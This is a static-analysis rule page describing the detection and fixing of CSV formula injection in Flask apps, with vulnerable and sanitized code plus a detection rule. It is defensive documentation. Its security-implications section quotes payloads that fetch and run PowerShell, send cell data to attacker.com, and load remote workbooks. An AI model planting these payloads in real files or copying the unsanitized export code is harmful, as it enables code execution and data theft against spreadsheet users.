# PYTHON-FLASK-SEC-009: Flask CSV Injection

> **Severity:** MEDIUM | **CWE:** CWE-1236 | **OWASP:** A03:2021

- **Language:** Python
- **Category:** Flask
- **URL:** https://codepathfinder.dev/registry/python/flask/PYTHON-FLASK-SEC-009
- **Detection:** `pathfinder scan --ruleset python/PYTHON-FLASK-SEC-009 --project .`

## Description

This rule detects CSV injection (also known as formula injection or spreadsheet
injection) in Flask applications where user-controlled input from HTTP request
parameters flows to csv.writer.writerow() or csv.writer.writerows() without
stripping spreadsheet formula trigger characters.

CSV files generated by Flask applications are frequently downloaded and opened
in Microsoft Excel, LibreOffice Calc, or Google Sheets. When a CSV cell value
begins with =, +, -, or @, spreadsheet applications interpret it as a formula
rather than data. An attacker who supplies a value like =HYPERLINK("http://evil.com","Click")
or =cmd|'/C calc'!A0 (the DDE payload for Excel) causes the formula to execute
when the victim opens the CSV file -- potentially launching applications, making
DNS lookups, or stealing data through the hyperlink callback.

The rule traces tainted data from Flask request sources through variable assignments
and function calls to the row data argument of csv.writer.writerow() and writerows()
at position 0. Since there is no standard Python sanitizer for CSV formula injection,
the fix requires explicit data validation: check whether the first character of each
string cell value is a formula trigger character and either reject the input or
prefix it with a single quote to prevent formula interpretation.


## Vulnerable Code

```python
from flask import Flask, request
import csv, io

app = Flask(__name__)

@app.route('/export')
def export_csv():
    name = request.args.get('name')
    output = io.StringIO()
    writer = csv.writer(output)
    writer.writerow([name, "data"])
    return output.getvalue()
```

## Secure Code

```python
from flask import Flask, request, Response
import csv
import io

app = Flask(__name__)

def sanitize_csv_field(value):
    """
    Prevent CSV formula injection by prefixing formula trigger characters.
    Leading =, +, -, @ are treated as formula starters by spreadsheet apps.
    Prefixing with a tab character (\t) or single quote disarms the formula.
    """
    if isinstance(value, str) and value and value[0] in ('=', '+', '-', '@', '\t', '\r'):
        return '\t' + value  # Tab prefix -- ignored by CSV parsers, disarms formula
    return value

@app.route('/export')
def export_csv():
    name = request.args.get('name', '')
    email = request.args.get('email', '')

    output = io.StringIO()
    writer = csv.writer(output)
    writer.writerow(['Name', 'Email'])
    # SAFE: sanitize_csv_field() strips formula trigger characters
    writer.writerow([sanitize_csv_field(name), sanitize_csv_field(email)])

    response = Response(output.getvalue(), mimetype='text/csv')
    response.headers['Content-Disposition'] = 'attachment; filename=export.csv'
    return response

```

## Detection Rule (Python SDK)

```python
from codepathfinder.python_decorators import python_rule
from codepathfinder import calls, flows, QueryType
from codepathfinder.presets import PropagationPresets

class CSVWriter(QueryType):
    fqns = ["csv.writer", "csv.DictWriter"]
    patterns = ["*Writer"]
    match_subclasses = True


@python_rule(
    id="PYTHON-FLASK-SEC-009",
    name="Flask CSV Injection",
    severity="MEDIUM",
    category="flask",
    cwe="CWE-1236",
    tags="python,flask,csv-injection,CWE-1236",
    message="User input flows to CSV writer. Sanitize by removing leading =, +, -, @ characters.",
    owasp="A03:2021",
)
def detect_flask_csv_injection():
    """Detects Flask request data flowing to csv.writer.writerow()."""
    return flows(
        from_sources=[
            calls("request.args.get"),
            calls("request.form.get"),
            calls("request.values.get"),
            calls("request.get_json"),
        ],
        to_sinks=[
            CSVWriter.method("writerow", "writerows").tracks(0),
            calls("writer.writerow"),
            calls("writer.writerows"),
            calls("csv.writer"),
        ],
        sanitized_by=[],
        propagates_through=PropagationPresets.standard(),
        scope="global",
    )
```

## How to Fix

- Before writing any user-supplied string value to a CSV row, check if the first character is =, +, -, or @ and either reject the input or prefix it with a tab character or single quote to prevent formula interpretation.
- Use the defusedcsv library (a drop-in replacement for Python's csv module) which automatically sanitizes formula injection characters.
- Validate user input at the point of collection (request parameter parsing) to reject inputs that begin with formula trigger characters if such characters are not valid for the field.
- Set the Content-Disposition: attachment header on CSV responses to prevent browsers from rendering them inline, ensuring they are downloaded as files.
- Consider generating XLSX files using openpyxl instead of CSV -- XLSX files do not execute formulas from text cell values by default.

## Security Implications

- **Remote Code Execution via Excel DDE Formulas:** Excel's Dynamic Data Exchange (DDE) feature can be triggered via CSV formulas.
A payload like =cmd|'/C powershell -nop -c "iex(New-Object Net.WebClient).DownloadString(url)"'!A0
in a CSV cell executes arbitrary PowerShell when a victim opens the file in Excel
with DDE enabled. This is a client-side RCE delivered through a server-generated
CSV export endpoint.

- **Data Exfiltration via Hyperlink Callbacks:** The =HYPERLINK("http://attacker.com/exfil?data="&A1,"click") formula sends cell
contents from adjacent cells to the attacker's server when the victim clicks the
hyperlink or in some Excel versions when the file opens. User data, including other
exported fields in the same CSV row, can be exfiltrated this way.

- **Phishing via Deceptive Cell Content:** Formula injection can display deceptive content in cells that appears legitimate
when rendered: =IF(1,"Verified Account",""). An attacker exports a report that
appears to show "Verified Account" status for a row they control, manipulating
business decisions based on the fraudulent CSV export.

- **Persistence via External References:** Spreadsheet formulas can reference external workbooks: ='http://attacker.com/payload.xlsx'!A1.
When the victim opens the CSV, Excel fetches the external workbook, executing
any macros it contains. This is a persistence mechanism that operates outside
the Flask application after the initial CSV download.


## FAQ

**Q: CSV injection seems low severity. Why does this matter?**

CSV injection is client-side -- the actual exploit happens when the victim opens
the file in Excel or Calc, not on the server. This makes it easy to underestimate.
In practice, CSV exports from business applications contain sensitive data (user
lists, transaction records, financial reports) and are opened by executives,
accountants, and administrators -- high-value targets whose machines have access
to sensitive systems. A DDE payload in a CSV export from your Flask app is a
phishing vector with your application's credibility attached to it.


**Q: Does Python's csv module automatically escape formula characters?**

No. Python's csv module handles CSV syntax (quoting commas, newlines, quotes)
but has no concept of spreadsheet formula characters. It will write =DANGEROUS()
to a CSV cell exactly as provided. The sanitization must be done by the application
before passing values to csv.writer.


**Q: What is the defusedcsv library and is it a drop-in replacement?**

defusedcsv is a wrapper around Python's csv module that automatically prefixes
formula trigger characters (=, +, -, @) with a tab character. It is a drop-in
replacement: replace import csv with import defusedcsv as csv and existing code
works without changes. It is the lowest-effort fix for this vulnerability.


**Q: Does prefixing with a tab break the CSV format?**

A tab prefix (\t) in a CSV cell value becomes part of the cell string when
loaded in Excel or Calc. The cell displays as " value" with a leading space
(or tab, depending on rendering). For most export use cases this is acceptable.
For display-sensitive exports, use a single quote prefix instead -- Excel strips
the leading quote and displays the cell as plain text without the quote character.


**Q: Which spreadsheet applications are affected?**

Microsoft Excel (all versions with DDE enabled), LibreOffice Calc (BASIC macros
via formulas), and Google Sheets (hyperlink formulas, some formula execution).
The exact capabilities vary by application version and configuration, but the
=HYPERLINK() exfiltration vector works across all three. Excel with DDE enabled
is the most dangerous target.


**Q: We validate that CSV exports only contain alphanumeric data for most fields. Is that enough?**

If every field that could contain user-supplied text is validated against a strict
allowlist that excludes =, +, -, and @ as leading characters, the injection vector
is closed for those fields. The rule only triggers on paths where tainted input
actually reaches csv.writer. If your validation happens before the data enters the
tainted flow, there should be no finding.


**Q: How do I test that my sanitization actually works?**

Supply =HYPERLINK("http://example.com","test") as a CSV field value through the
API or form, download the resulting CSV, and open it in Excel or LibreOffice Calc.
If the cell shows the literal text (with a leading tab or quote) rather than a
clickable hyperlink, the sanitization is effective. Also test =1+1 to verify
arithmetic formulas are not evaluated.


## References

- [CWE-1236: CSV Formula Injection](https://cwe.mitre.org/data/definitions/1236.html)
- [OWASP CSV Injection](https://owasp.org/www-community/attacks/CSV_Injection)
- [defusedcsv library](https://github.com/raphaelm/defusedcsv)
- [Python csv module documentation](https://docs.python.org/3/library/csv.html)
- [OWASP Data Validation Cheat Sheet](https://cheatsheetseries.owasp.org/cheatsheets/Input_Validation_Cheat_Sheet.html)
- [Microsoft Excel DDE security guidance](https://support.microsoft.com/en-us/office/security-considerations-for-using-dynamic-data-exchange-dde)

---

Source: https://codepathfinder.dev/registry/python/flask/PYTHON-FLASK-SEC-009
Code Pathfinder — Open source, type-aware SAST with cross-file dataflow analysis